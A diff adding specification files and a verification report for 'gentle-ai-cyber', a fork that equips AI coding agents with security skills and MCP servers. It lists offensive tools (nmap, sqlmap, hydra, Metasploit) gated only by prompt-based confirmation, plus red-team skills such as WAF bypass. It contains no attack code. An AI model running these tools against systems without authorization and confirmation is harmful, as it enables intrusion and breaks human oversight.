+| CYBER-AGENT-06: Injected as markdown sections | Uses InjectMarkdownSection with markers | Both `gentleman-soc` and `gentle-ai-cyber:destructive-warning` markers | ✅ COMPLIANT |
+| CYBER-AGENT-07: Cross-agent availability | Generic adapter interface, not agent-specific | `InjectGentlemanSOC` and `InjectDestructiveWarning` use `SystemPromptFile(homeDir string)` adapter | ✅ COMPLIANT |
+| CYBER-PERM-01: PermissionTier constants | 3 constants defined | `PermissionTierUnrestricted`, `PermissionTierDestructive`, `PermissionTierRestricted` confirmed in types.go | ✅ COMPLIANT |
+| CYBER-PERM-01: ToolPermission struct | Struct with MCPServer, Tools, Tier | Confirmed in types.go | ✅ COMPLIANT |
+| CYBER-PERM-02: Destructive warning in system prompts | Warning block injected for cyber preset | `InjectDestructiveWarning` function exists, uses `gentle-ai-cyber:destructive-warning` marker | ✅ COMPLIANT |
+| CYBER-PERM-02: Warning mentions specific tools | At minimum nmap_scan, sqlmap_scan, hydra_attack, metasploit_run | All 4 present in manifest, dynamically loaded via `destructiveWarningBlock` | ✅ COMPLIANT |
+| CYBER-PERM-02: Non-cyber presets unchanged | No destructive warning for non-cyber presets | Warning injection is opt-in (requires explicit call) | ✅ COMPLIANT |
+| CYBER-PERM-03: kali-mcp JSON warning comment | `/**_WARNING**/` comment at top | `kaliWarningComment` iterates tools and prefixes with `/**_WARNING**/` | ✅ COMPLIANT |
+| CYBER-PERM-03: Unrestricted MCPs have no warning | No shodan/virustotal warning | No `ShodanWarning` or `VirusTotalWarning` functions | ✅ COMPLIANT |
+| CYBER-PERM-04: Soft gate only | No runtime interception | No BlockMCP/InterceptMCP/ProxyMCP patterns | ✅ COMPLIANT |
+| CYBER-PERM-05: Manifest is source of truth | Permission tier from manifest, not hardcoded | `loadKaliManifest()` parses JSON, `manifest.DestructiveTools` used dynamically | ✅ COMPLIANT |
+
+**Compliance summary**: 21/21 scenarios compliant
+
+## Correctness (Static Evidence)
+
+| Requirement | Status | Notes |
+|------------|--------|-------|
+| Task 4.1: gentleman-soc.md exists | ✅ Implemented | 535 lines, PICERL pipeline, 6 phases, MITRE mapping, quality gates |
+| Task 4.2: Embedded in Go assets | ✅ Implemented | `go:embed all:agents` in assets.go; `GentlemanSOCContent()` reads it |
+| Task 4.3: Destructive warning injection | ✅ Implemented | `InjectDestructiveWarning` uses `InjectMarkdownSection` with section markers |
+| Task 4.4: kali-mcp JSON warning | ✅ Implemented | `kaliWarningComment` adds `/**_WARNING**/` prefix with tool list for StrategySeparateMCPFiles |
+| Task 4.5: --cyber flag in validate.go | ✅ Implemented | `PresetCyber` in case statement and `MVPCyberSkills()` in skill validation |
+
+## Coherence (Design)
+
+| Decision | Followed? | Notes |
+|----------|-----------|-------|
+| gentleman-soc is agent definition, not new AgentID | ✅ Yes | No AgentGentlemanSOC constant; uses markdown section injection |
+| Soft gate via agent prompt | ✅ Yes | No runtime proxy; text-based warning in system prompt |
+| Manifest is source of truth for permission tier | ✅ Yes | Reads from `mcps/kali-mcp/manifest.json` at runtime |
+| kaliWarningComment for StrategySeparateMCPFiles | ✅ Yes | Implemented in `injectKaliSeparateFile` |
+
+## Issues Found
+
+**CRITICAL**: None
+
+**WARNING**:
+1. **Uncommitted files**: `internal/assets/agents/gentleman-soc.md` and `internal/components/mcp/kali_mcp.go` are untracked (not yet `git add`-ed). The implementation is complete and tests pass, but these files need to be staged and committed before the PR is created.
+2. **No isolated unit tests for kali_mcp.go**: The `InjectDestructiveWarning`, `kaliWarningComment`, `destructiveWarningBlock`, `KaliMCPOverlayJSON`, and `InjectGentlemanSOC` functions don't have dedicated test files yet. Phase 5 (Tasks 5.1-5.5) creates these tests.
+3. **Agent paths in gentleman-soc.md**: Skill paths follow `skills/{name}/SKILL.md` convention (correct per spec), but installed paths will differ since skills are embedded → extracted. This is consistent with how gentle-ai handles all skills.
+
+**SUGGESTION**:
+1. Consider adding a `gentleman-soc` asset reference constant or function in `internal/assets/` that's parallel to other agent asset accessors, rather than having the path only referenced within `kali_mcp.go`. This improves discoverability.
+
+## Verdict
+
+**PASS WITH WARNINGS**
+
+All 5 Phase 4 tasks are implemented and functional. All 21 spec scenarios are compliant. Build, vet, and all tests pass with no regressions. The two uncommitted files need to be staged before PR submission. No isolated unit tests for kali_mcp.go yet (expected: Phase 5 scope).

--- a/openspec/specs/cyber-agent/spec.md
+++ b/openspec/specs/cyber-agent/spec.md
@@ -1,0 +1,131 @@
+# Cybersecurity Agent Definition Specification
+
+## Purpose
+
+Defines the `gentleman-soc.md` agent definition file: its content requirements, injection strategy, skill references, and relationship to existing agent identities.
+
+## Requirements
+
+### Requirement: Gentleman-Soc Agent Definition File
+
+The system MUST include a valid Markdown file at `agents/gentleman-soc.md` that defines the SOC orchestrator agent. This file SHALL be embedded as a Go asset and installed into the agent's configuration directory when the cyber preset is selected.
+
+#### Scenario: Gentleman-soc file exists and is valid markdown
+
+- GIVEN the cybersecurity fork repository
+- WHEN `agents/gentleman-soc.md` is read
+- THEN the file exists
+- AND it contains valid markdown content with at least one markdown heading
+
+#### Scenario: Gentleman-soc file is embedded as a Go asset
+
+- GIVEN the codebase is compiled
+- WHEN the `internal/assets/` package is inspected
+- THEN `gentleman-soc.md` is accessible as an embedded asset
+- AND `go:embed` directive references it correctly
+
+---
+
+### Requirement: PICERL Pipeline Structure
+
+The gentleman-soc definition MUST describe a structured incident response pipeline using a phase-based framework. The pipeline SHALL cover at minimum: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned (PICERL or equivalent).
+
+#### Scenario: Pipeline phases are documented
+
+- GIVEN the `agents/gentleman-soc.md` content
+- WHEN the content is searched for pipeline phase names
+- THEN at least 5 distinct phases are defined
+- AND each phase maps to one or more cybersecurity skills from the catalog
+
+#### Scenario: Each phase references specific skills
+
+- GIVEN the gentleman-soc definition
+- WHEN the pipeline section is examined
+- THEN for each phase, at least one skill from the `soc` category is referenced by name
+- AND referenced skill names match their catalog `Name` field (e.g., `malware-triage`, not `malware_triage`)
+
+---
+
+### Requirement: Skill Loading Instructions
+
+The gentleman-soc definition MUST include instructions for WHEN to load each of the 6 SOC skills (`malware-triage`, `specialized-file-analyzer`, `malware-dynamic-analysis`, `malware-report-writer`, `detection-engineer`, `python-security`). The loading triggers SHALL align with the PICERL pipeline phases.
+
+#### Scenario: All 6 SOC skills are referenced with loading conditions
+
+- GIVEN `agents/gentleman-soc.md`
+- WHEN all skill references are counted
+- THEN all 6 SOC/blue-team skills are referenced by name
+- AND each reference includes a trigger condition (e.g., "when user uploads a suspicious file")
+
+#### Scenario: Skill references use correct file paths
+
+- GIVEN the gentleman-soc definition
+- WHEN skill file paths are mentioned
+- THEN paths follow the pattern `skills/{name}/SKILL.md` (gentle-ai convention)
+- AND no paths reference `~/.claude/` or any agent-specific prefix (the installer handles path resolution)
+
+---
+
+### Requirement: MITRE ATT&CK Mapping
+
+The gentleman-soc definition SHOULD include a mapping from incident response phases to relevant MITRE ATT&CK tactics or techniques, providing analysts with a framework for threat classification.
+
+#### Scenario: MITRE ATT&CK references are present
+
+- GIVEN `agents/gentleman-soc.md`
+- WHEN the content is searched for MITRE ATT&CK terminology
+- THEN at least one MITRE ATT&CK tactic (e.g., `Initial Access`, `Execution`, `Exfiltration`) is referenced
+- OR a dedicated MITRE ATT&CK mapping section exists
+
+---
+
+### Requirement: Quality Gates
+
+The gentleman-soc definition MUST define quality gates — conditions that MUST be satisfied before moving from one pipeline phase to the next. Each gate SHALL be testable (verifiable by a human or automated check).
+
+#### Scenario: Quality gates are defined between phases
+
+- GIVEN the gentleman-soc pipeline structure
+- WHEN the transition between any two consecutive phases is examined
+- THEN at least one quality gate condition is described
+- AND the condition is expressed as a checkable statement (not vague prose)
+
+#### Scenario: Quality gates are not implementation instructions
+
+- GIVEN any quality gate definition
+- WHEN the text is examined
+- THEN it describes WHAT must be verified, not HOW to verify it in code
+- AND it does not reference specific APIs, tools, or programming languages
+
+---
+
+### Requirement: Agent Identity
+
+The gentleman-soc definition MUST NOT create a new `AgentID`. It SHALL be an agent augmentation injected via the `StrategyMarkdownSections` or equivalent strategy, not a standalone agent adapter.
+
+#### Scenario: No new AgentID constant for gentleman-soc
+
+- GIVEN `internal/model/types.go`
+- WHEN the `AgentID` constants are examined
+- THEN no constant named `AgentSOC` or `AgentGentlemanSOC` exists
+- AND the total number of AgentID constants matches the gentle-ai upstream count
+
+#### Scenario: Gentleman-soc injects as markdown sections
+
+- GIVEN the cyber preset is installed for an agent using `StrategyMarkdownSections` (e.g., Claude Code)
+- WHEN the system prompt file is generated
+- THEN gentleman-soc content appears as a markdown section delimited by `<!-- gentle-ai:gentleman-soc -->` markers
+- AND it augments, not replaces, the existing agent persona
+
+---
+
+### Requirement: Cross-Agent Availability
+
+The gentleman-soc definition MUST be available to all 13 agents supported by gentle-ai. It SHALL NOT be restricted to a specific agent or agent class.
+
+#### Scenario: Cyber preset installs gentleman-soc for all selected agents
+
+- GIVEN the cyber preset is installed with multiple agents selected
+- WHEN the installation completes
+- THEN gentleman-soc content is present in each agent's configuration directory
+- AND the content is identical across agents (no agent-specific variations)

--- a/openspec/specs/cyber-installer/spec.md
+++ b/openspec/specs/cyber-installer/spec.md
@@ -1,0 +1,149 @@
+# Cybersecurity Installer Specification
+
+## Purpose
+
+Defines the `PresetCyber` preset in the TUI installer, the `--cyber` CLI flag, and the cybersecurity edition's behavior during installation — including skill selection, MCP configuration, and agent augmentation.
+
+## Requirements
+
+### Requirement: PresetCyber Constant
+
+The system MUST define a `PresetCyber` constant of type `PresetID` with value `"cyber"` in `internal/model/types.go`. It SHALL be added alongside existing presets without removing or altering them.
+
+#### Scenario: PresetCyber is defined
+
+- GIVEN the codebase is compiled
+- WHEN `model.PresetCyber` is referenced
+- THEN its value is the string `"cyber"`
+
+#### Scenario: Existing presets are unchanged
+
+- GIVEN the fork is built
+- WHEN the `PresetOptions()` function returns available presets
+- THEN `full-gentleman`, `ecosystem-only`, `minimal`, and `custom` are all present
+- AND `cyber` is also present
+
+---
+
+### Requirement: TUI Preset Selection
+
+The TUI preset selection screen MUST display `PresetCyber` as a selectable option. The description SHALL clearly indicate it is the cybersecurity edition and SHALL mention that destructive tools require manual confirmation.
+
+#### Scenario: Cyber preset appears in TUI preset list
+
+- GIVEN the TUI is launched
+- WHEN the preset selection screen is displayed
+- THEN "cyber" is listed as one of the selectable presets
+- AND the description includes the text "Cybersecurity Edition"
+- AND the description includes a warning about destructive tool confirmation
+
+#### Scenario: Cyber preset description is distinct from other presets
+
+- GIVEN the TUI preset screen is rendered
+- WHEN comparing the cyber preset description to other presets
+- THEN the cyber description is unique (not identical to full-gentleman, ecosystem-only, minimal, or custom)
+
+#### Scenario: User can navigate to and select cyber preset
+
+- GIVEN the TUI is on the preset selection screen
+- WHEN the user navigates to the cyber preset and presses enter/select
+- THEN `m.Selection.Preset` is set to `model.PresetCyber`
+- AND the installer proceeds to the next screen
+
+---
+
+### Requirement: Cyber Preset Composition
+
+Selecting `PresetCyber` MUST configure the following components compared to `PresetFullGentleman`:
+- All full-gentleman components (Engram, SDD, persona, existing skills, docs)
+- PLUS all 11 cybersecurity skills
+- PLUS kali-mcp, shodan-mcp, and virustotal-mcp (with kali-mcp requiring explicit opt-in)
+- PLUS gentleman-soc agent augmentation
+- PLUS destructive-tool warning blocks in agent prompts
+
+#### Scenario: Cyber preset includes full-gentleman base
+
+- GIVEN `PresetCyber` is selected
+- WHEN the installer resolves component dependencies
+- THEN all components from `PresetFullGentleman` are included
+- AND no full-gentleman component is removed
+
+#### Scenario: Cyber preset adds 11 security skills
+
+- GIVEN `PresetCyber` is selected
+- WHEN the skill selection step computes the skill list
+- THEN all 11 cybersecurity skills are present in the plan
+- AND they are grouped under their respective categories (red-team, blue-team, soc)
+
+#### Scenario: Cyber preset adds 3 MCP servers
+
+- GIVEN `PresetCyber` is selected
+- WHEN the MCP configuration step runs
+- THEN shodan-mcp and virustotal-mcp are enabled by default
+- AND kali-mcp is offered with a destructive capability warning and requires explicit opt-in
+
+---
+
+### Requirement: --cyber CLI Flag
+
+The binary MUST accept a `--cyber` CLI flag that sets the active preset to `PresetCyber` at startup, equivalent to `--preset=cyber`.
+
+#### Scenario: --cyber flag selects cyber preset
+
+- GIVEN the binary is invoked with `gentle-ai-cyber --cyber`
+- WHEN the application initializes
+- THEN `Selection.Preset` is set to `model.PresetCyber`
+- AND the TUI starts at the component review screen (skipping preset selection)
+
+#### Scenario: --cyber flag is mutually exclusive with --preset
+
+- GIVEN the binary is invoked with `gentle-ai-cyber --cyber --preset=minimal`
+- WHEN the application initializes
+- THEN an error is returned indicating the flags conflict
+- AND the application exits with a non-zero status code
+
+#### Scenario: --cyber flag is absent in base gentle-ai builds
+
+- GIVEN the base gentle-ai binary (without cyber additions)
+- WHEN `gentle-ai --help` is invoked
+- THEN `--cyber` is NOT listed in the help output
+
+---
+
+### Requirement: Installer Does Not Break Existing Flows
+
+The addition of the cyber preset MUST NOT alter the behavior of existing presets. Selecting `full-gentleman`, `ecosystem-only`, `minimal`, or `custom` MUST produce identical results to upstream gentle-ai.
+
+#### Scenario: Full-gentleman preset unchanged
+
+- GIVEN `PresetFullGentleman` is selected in the forked binary
+- WHEN installation completes
+- THEN the installed components match exactly what upstream gentle-ai would install for `full-gentleman`
+- AND no cybersecurity skills, MCPs, or prompt warnings are installed
+
+#### Scenario: Custom preset retains full manual selection capability
+
+- GIVEN `PresetCustom` is selected in the forked binary
+- WHEN the user manually selects components
+- THEN cybersecurity skills and MCPs are available for manual selection
+- AND destructive tool warnings are injected only if kali-mcp is manually enabled
+
+---
+
+### Requirement: Binary Identity
+
+The forked binary SHALL be named `gentle-ai-cyber`. The Go module path SHALL be `github.com/rortizs/gentle-ai-cyber`. The binary description SHALL reference "cybersecurity edition".
+
+#### Scenario: Binary compiles with correct name
+
+- GIVEN the fork repository is checked out
+- WHEN `go build ./cmd/gentle-ai-cyber` is executed
+- THEN compilation succeeds without errors
+- AND the output binary is named `gentle-ai-cyber`
+
+#### Scenario: Go module path is set to fork identity
+
+- GIVEN `go.mod` is read
+- WHEN the module declaration is inspected
+- THEN the module path is `github.com/rortizs/gentle-ai-cyber`
+- AND it is different from `github.com/gentleman-programming/gentle-ai`

--- a/openspec/specs/cyber-mcp/spec.md
+++ b/openspec/specs/cyber-mcp/spec.md
@@ -1,0 +1,127 @@
+# Cybersecurity MCP Configuration Specification
+
+## Purpose
+
+Defines the 3 MCP servers bundled in v1 (kali-mcp, shodan-mcp, virustotal-mcp), their manifest format, permission tier declarations, and injection strategy into agent configurations.
+
+## Requirements
+
+### Requirement: MCP Server Manifest Files
+
+Each cybersecurity MCP server MUST have a `manifest.json` file at `mcps/{server-name}/manifest.json` containing at minimum: `name`, `type`, `config`, `permission_tier`, and `description`.
+
+The `permission_tier` field SHALL be one of: `unrestricted`, `destructive`, or `restricted`.
+
+#### Scenario: All 3 MCP manifests exist with required fields
+
+- GIVEN the cybersecurity fork is built
+- WHEN MCP manifests are loaded from `mcps/`
+- THEN `kali-mcp/manifest.json`, `shodan-mcp/manifest.json`, and `virustotal-mcp/manifest.json` all exist
+- AND each manifest contains `name`, `type`, `config`, `permission_tier`, and `description` fields
+
+#### Scenario: Manifests are valid JSON
+
+- GIVEN any cybersecurity MCP manifest file
+- WHEN the file is parsed as JSON
+- THEN parsing succeeds without error
+- AND the root object contains all required top-level keys
+
+---
+
+### Requirement: MCP Permission Tier Classification
+
+The kali-mcp server MUST declare `permission_tier: destructive`. Shodan-mcp and virustotal-mcp MUST declare `permission_tier: unrestricted`.
+
+#### Scenario: Kali-mcp is classified as destructive
+
+- GIVEN the kali-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"destructive"`
+
+#### Scenario: Shodan-mcp is classified as unrestricted
+
+- GIVEN the shodan-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"unrestricted"`
+
+#### Scenario: Virustotal-mcp is classified as unrestricted
+
+- GIVEN the virustotal-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"unrestricted"`
+
+---
+
+### Requirement: Destructive Tool Listing
+
+For any MCP manifest with `permission_tier: destructive`, the manifest MUST include a `destructive_tools` array listing every tool that requires user confirmation before execution.
+
+#### Scenario: Kali-mcp lists all destructive tools
+
+- GIVEN the kali-mcp manifest with `permission_tier: destructive`
+- WHEN the `destructive_tools` field is read
+- THEN the array contains at minimum: `nmap_scan`, `sqlmap_scan`, `hydra_attack`, `metasploit_run`
+- AND each tool name matches an actual tool provided by the kali-mcp server
+
+#### Scenario: Unrestricted manifests have no destructive_tools array
+
+- GIVEN the shodan-mcp manifest with `permission_tier: unrestricted`
+- WHEN the `destructive_tools` field is read
+- THEN it is either absent or an empty array
+
+#### Scenario: Unrestricted manifests must not list tools as destructive
+
+- GIVEN the virustotal-mcp manifest with `permission_tier: unrestricted`
+- WHEN the `destructive_tools` field is examined (if present)
+- THEN it is empty
+- OR the field is absent entirely
+
+---
+
+### Requirement: MCP Injection Strategy
+
+Each cybersecurity MCP server MUST follow the existing agent-specific MCP injection pattern: a Go file at `internal/components/mcp/{server-name}.go` that provides overlay JSON per agent strategy, wired through `internal/components/mcp/inject.go`.
+
+#### Scenario: Cyber MCP injection files exist
+
+- GIVEN the fork is compiled
+- WHEN the `internal/components/mcp/` package is inspected
+- THEN `kali_mcp.go`, `shodan_mcp.go`, and `virustotal_mcp.go` exist
+- AND each file exports overlay JSON for at least the `StrategySeparateMCPFiles` strategy
+
+#### Scenario: Inject handles cyber MCPs alongside existing MCPs
+
+- GIVEN the cyber preset is selected
+- WHEN MCP injection runs
+- THEN context7 and engram MCPs are injected as normal
+- AND kali-mcp, shodan-mcp, and virustotal-mcp are injected for all agents in the preset
+
+---
+
+### Requirement: Prowler MCP External Detection
+
+The installer MUST detect whether `prowler-mcp` is available on the system PATH. If found, it SHALL offer to configure it as an MCP server. If not found, it SHALL inform the user and continue without error.
+
+The prowler-mcp SHALL NOT be bundled or embedded in the binary.
+
+#### Scenario: Prowler-mcp detected on PATH
+
+- GIVEN `prowler-mcp` is installed and available on PATH
+- WHEN the installer reaches the MCP configuration step
+- THEN the user is offered to include prowler-mcp in the configuration
+- AND the installer shows the command that was used to detect it
+
+#### Scenario: Prowler-mcp not detected on PATH
+
+- GIVEN `prowler-mcp` is NOT installed
+- WHEN the installer reaches the MCP configuration step
+- THEN a message informs the user: "Prowler MCP not detected. Install with: `pip install prowler-mcp` or skip."
+- AND installation continues without error
+- AND prowler-mcp is NOT configured
+
+#### Scenario: Prowler-mcp detection failure does not block installation
+
+- GIVEN PATH lookup for `prowler-mcp` fails for any reason (e.g., permission error)
+- WHEN the installer attempts detection
+- THEN it treats the result as "not found" and continues
+- AND a diagnostic message is logged for debugging

--- a/openspec/specs/cyber-permissions/spec.md
+++ b/openspec/specs/cyber-permissions/spec.md
@@ -1,0 +1,134 @@
+# Cybersecurity Permission Model Specification
+
+## Purpose
+
+Defines the soft-gate permission model for destructive cybersecurity tools: how tools are classified, what warnings agents receive, and how the confirmation flow works in the generated agent system prompts.
+
+## Requirements
+
+### Requirement: Permission Tier Type Definitions
+
+The system MUST define a `PermissionTier` string type with exactly three constant values: `unrestricted`, `destructive`, and `restricted`. It SHALL also define a `ToolPermission` struct containing `MCPServer`, `Tools`, and `Tier` fields.
+
+#### Scenario: PermissionTier constants are defined
+
+- GIVEN the `internal/model/types.go` file is compiled
+- WHEN the `PermissionTier` type is inspected
+- THEN `PermissionTierUnrestricted` has value `"unrestricted"`
+- AND `PermissionTierDestructive` has value `"destructive"`
+- AND `PermissionTierRestricted` has value `"restricted"`
+
+#### Scenario: ToolPermission struct is defined
+
+- GIVEN the codebase is compiled
+- WHEN the `ToolPermission` type is inspected
+- THEN it has fields `MCPServer string`, `Tools []string`, and `Tier PermissionTier`
+
+---
+
+### Requirement: Destructive Tool Warning in Agent System Prompts
+
+When the cybersecurity preset is selected, the installer MUST inject a destructive-tool warning block into every agent's system prompt. The block SHALL instruct the agent to require explicit human confirmation before invoking any tool tagged as `destructive`.
+
+#### Scenario: Cyber preset injects destructive tool warning
+
+- GIVEN the user selects the `cyber` preset during installation
+- WHEN system prompts are generated for any agent
+- THEN each system prompt includes a block containing the text "Before executing any tool marked DESTRUCTIVE"
+- AND the block instructs the agent to "confirm with the user" before invoking such tools
+
+#### Scenario: Non-cyber presets do not inject destructive warnings
+
+- GIVEN the user selects `full-gentleman`, `ecosystem-only`, `minimal`, or `custom`
+- WHEN system prompts are generated
+- THEN no destructive-tool warning block is present
+- AND existing gentle-ai prompt behavior is unchanged
+
+#### Scenario: Warning block references specific tools from kali-mcp
+
+- GIVEN the destructive tool warning is injected
+- WHEN the block content is examined
+- THEN it mentions at minimum: `nmap_scan`, `sqlmap_scan`, `hydra_attack`, and `metasploit_run` as examples requiring confirmation
+- AND it states these are from the `kali-mcp` server
+
+---
+
+### Requirement: MCP JSON Warning Comments
+
+For agents that use `StrategySeparateMCPFiles`, the generated MCP JSON file for kali-mcp MUST include a `/**_WARNING**` comment at the top listing the destructive tools and requiring manual confirmation.
+
+#### Scenario: Kali-mcp JSON includes warning comment
+
+- GIVEN the cyber preset is installed for an agent using `StrategySeparateMCPFiles` (e.g., Claude Code)
+- WHEN the kali-mcp MCP JSON file is written
+- THEN the file begins with a comment containing `_WARNING_`
+- AND the comment lists the destructive tools from the manifest
+- AND the comment states these tools require human confirmation
+
+#### Scenario: Unrestricted MCP JSON files have no warning comment
+
+- GIVEN the cyber preset is installed
+- WHEN shodan-mcp or virustotal-mcp MCP JSON files are written
+- THEN no `_WARNING_` comment is present at the top of the file
+- OR the comment is informational (non-warning) in nature
+
+---
+
+### Requirement: Confirmation is a Soft Gate
+
+The destructive-tool confirmation MUST be a soft gate — enforced through agent prompt compliance, NOT through a runtime proxy or hard block. The system SHALL NOT intercept, block, or proxy MCP tool calls at the Go runtime level in v1.
+
+#### Scenario: No runtime interception of MCP calls
+
+- GIVEN kali-mcp is configured for an agent
+- WHEN the agent invokes `nmap_scan` without prior human confirmation
+- THEN the tool call proceeds normally at the MCP transport level
+- AND no Go-side error, panic, or block is triggered
+
+#### Scenario: Soft gate is documented in user-facing docs
+
+- GIVEN the cybersecurity fork documentation is generated
+- WHEN the permissions documentation is read
+- THEN it explicitly states the gate is "prompt-based (soft gate)"
+- AND it notes that a hard proxy gate is planned for v2
+
+---
+
+### Requirement: Permission Tier Determination from Manifest
+
+At MCP injection time, the permission tier for each server MUST be read from its `manifest.json` file. The `permission_tier` field SHALL be the single source of truth; it MUST NOT be hardcoded in Go.
+
+#### Scenario: Manifest is the source of truth for permission tier
+
+- GIVEN the kali-mcp `manifest.json` has `"permission_tier": "destructive"`
+- WHEN MCP injection reads the permission tier
+- THEN the returned tier matches the manifest value
+- AND the Go code does not contain a hardcoded `PermissionTierDestructive` for kali-mcp
+
+#### Scenario: Changing manifest changes behavior without recompilation
+
+- GIVEN a user modifies the `permission_tier` in `mcps/kali-mcp/manifest.json` to `"unrestricted"`
+- WHEN the agent system prompt is regenerated
+- THEN the destructive tool warning is NOT present for kali-mcp
+- AND no Go recompilation is required
+
+---
+
+### Requirement: No MCP Servers Are Force-Enabled
+
+Destructive MCP servers (kali-mcp) MUST be opt-in. The installer SHALL list them as available but SHALL NOT enable them by default. The user MUST explicitly approve enabling destructive servers.
+
+#### Scenario: Kali-mcp requires explicit user approval
+
+- GIVEN the user selects the cyber preset
+- WHEN the installer reaches the MCP configuration screen
+- THEN kali-mcp is listed with a warning label indicating destructive capability
+- AND it is NOT pre-selected (requires user toggle)
+- AND the user must explicitly confirm before kali-mcp is configured
+
+#### Scenario: Unrestricted MCPs are pre-selected in cyber preset
+
+- GIVEN the user selects the cyber preset
+- WHEN the installer reaches the MCP configuration screen
+- THEN shodan-mcp and virustotal-mcp are pre-selected (enabled by default)
+- AND the user may deselect them if desired

--- a/openspec/specs/cyber-skills/spec.md
+++ b/openspec/specs/cyber-skills/spec.md
@@ -1,0 +1,125 @@
+# Cybersecurity Skills Catalog Specification
+
+## Purpose
+
+Defines the 11 v1 cybersecurity skills that MUST be ported from glitch-ai-toolkit into gentle-ai's skill catalog, their category taxonomy, frontmatter format, and registration in the Go catalog.
+
+## Requirements
+
+### Requirement: Skill Identity and Categorization
+
+The system MUST define exactly 11 cybersecurity skills across 4 security categories. Each skill SHALL be identified by a unique `SkillID` constant in `internal/model/types.go` and registered as a catalog entry in `internal/catalog/skills.go`.
+
+The security category taxonomy SHALL consist of: `red-team`, `blue-team`, `soc`, and `compliance`.
+
+#### Scenario: All 11 v1 skills are registered in the catalog
+
+- GIVEN the cybersecurity fork is built
+- WHEN `MVPCyberSkills()` is called
+- THEN exactly 11 skill entries are returned
+- AND each entry has a non-empty ID, Name, Category, and Priority
+
+#### Scenario: Red team skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `red-team` category is queried
+- THEN `pentest-orchestrator`, `ai-pentesting-validation`, `exploit-chain-patterns`, and `waf-detection-bypass` are present
+- AND each is tagged with Category `red-team` and Priority `p0`
+
+#### Scenario: Blue team skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `blue-team` category is queried
+- THEN `detection-engineer` and `python-security` are present
+- AND each is tagged with Category `blue-team` and Priority `p0`
+
+#### Scenario: SOC skills exist with correct categorization
+
+- GIVEN the catalog is loaded
+- WHEN the `soc` category is queried
+- THEN `malware-triage`, `specialized-file-analyzer`, `malware-dynamic-analysis`, and `malware-report-writer` are present
+- AND each is tagged with Category `soc` and Priority `p0`
+
+#### Scenario: Each skill has a unique SkillID that does not collide with existing IDs
+
+- GIVEN the existing 20 skill IDs in `internal/model/types.go`
+- WHEN the 11 cyber SkillIDs are added
+- THEN no cyber SkillID string duplicates an existing SkillID string
+- AND each cyber SkillID has a corresponding Go constant in the `SkillID` type
+
+---
+
+### Requirement: Skill Frontmatter Format
+
+Every cybersecurity skill SKILL.md file MUST contain valid YAML frontmatter with exactly four required fields: `name`, `description`, `license`, and `metadata` (containing `author` and `version`).
+
+The frontmatter SHALL follow gentle-ai's simple format — no `auto_invoke` tables, no `tool_schemas`, no execution directives.
+
+#### Scenario: Valid frontmatter exists on every cyber skill file
+
+- GIVEN a cybersecurity skill file at `skills/{name}/SKILL.md`
+- WHEN the file is parsed
+- THEN the frontmatter contains a `name` field matching the skill name
+- AND the frontmatter contains a `description` field with a one-line trigger description
+- AND the frontmatter contains `license: Apache-2.0`
+- AND `metadata.author` is `gentleman-programming`
+- AND `metadata.version` is a semantic version string (e.g., `"1.0"`)
+
+#### Scenario: Skill file has no auto_invoke or tool_schemas blocks
+
+- GIVEN any cybersecurity skill SKILL.md
+- WHEN the file content is examined
+- THEN it contains no `auto_invoke` YAML key
+- AND it contains no `tool_schemas` YAML key
+
+#### Scenario: Skill frontmatter parsing fails gracefully
+
+- GIVEN a cybersecurity skill SKILL.md with malformed YAML frontmatter
+- WHEN the catalog validation runs
+- THEN an error is returned indicating the file path and parse failure reason
+
+---
+
+### Requirement: Skill Content Completeness
+
+Each cybersecurity skill SKILL.md MUST include a `## Validation` section that declares expected output patterns for testing purposes. The validation section SHALL define at least one expected behavior or output pattern the skill should produce when loaded by an agent.
+
+#### Scenario: Skill file includes a validation section
+
+- GIVEN any cybersecurity skill SKILL.md
+- WHEN the file is read
+- THEN a `## Validation` section header exists
+- AND the section contains at least one declarative statement describing expected skill behavior
+
+#### Scenario: Skill file has minimum viable content
+
+- GIVEN a cybersecurity skill SKILL.md
+- WHEN the file content beyond frontmatter is examined
+- THEN at least one markdown heading exists (e.g., `## Overview` or `## Workflow`)
+- AND the total content length (excluding frontmatter) exceeds 100 characters
+
+---
+
+### Requirement: Owasp Security Best Practices Deferred to v2
+
+The `owasp-security-best-practices` skill SHALL NOT be included in v1. It MUST be tracked as a v2 skill and MUST NOT appear in the `MVPCyberSkills()` catalog.
+
+#### Scenario: Owasp security best practices is absent from v1 catalog
+
+- GIVEN the v1 cybersecurity catalog is built
+- WHEN `MVPCyberSkills()` is called
+- THEN `owasp-security-best-practices` is NOT in the returned list
+
+---
+
+### Requirement: No Regression on Existing Skills
+
+The addition of cybersecurity skills MUST NOT alter or remove any existing skill entry in `internal/catalog/skills.go`. The existing `MVPSkills()` function SHALL continue to return all 20 existing skill entries unchanged.
+
+#### Scenario: Existing MVP skills are unchanged
+
+- GIVEN the fork is built with cybersecurity additions
+- WHEN `MVPSkills()` is called
+- THEN exactly 20 skill entries are returned
+- AND all existing SkillIDs (sdd-init through work-unit-commits) are present
+- AND their Category and Priority values match the upstream gentle-ai definitions

--- a/openspec/specs/cyber-testing/spec.md
+++ b/openspec/specs/cyber-testing/spec.md
@@ -1,0 +1,158 @@
+# Cybersecurity BDD/TDD Testing Specification
+
+## Purpose
+
+Defines the security scenario test harness: validation pipeline tests, compliance mapping tests, skill behavior tests, and the definition of "passing" for the cybersecurity edition.
+
+## Requirements
+
+### Requirement: Skill Frontmatter Validation Tests
+
+The system MUST include automated tests that validate every cybersecurity skill SKILL.md file has complete and valid YAML frontmatter. Tests SHALL be in `internal/catalog/cyber_skills_test.go`.
+
+#### Scenario: All cyber skill frontmatter is valid
+
+- GIVEN all cybersecurity skill files exist under `skills/`
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN every skill file parses with valid YAML frontmatter
+- AND each frontmatter contains `name`, `description`, `license`, and `metadata` fields
+- AND `metadata.author` is `gentleman-programming`
+- AND `metadata.version` is a non-empty string
+
+#### Scenario: Malformed frontmatter causes test failure
+
+- GIVEN a cybersecurity skill SKILL.md has malformed YAML (missing closing `---`)
+- WHEN `TestCyberSkillsHaveRequiredFrontmatter` runs
+- THEN the test fails
+- AND the failure message includes the file path and parse error
+
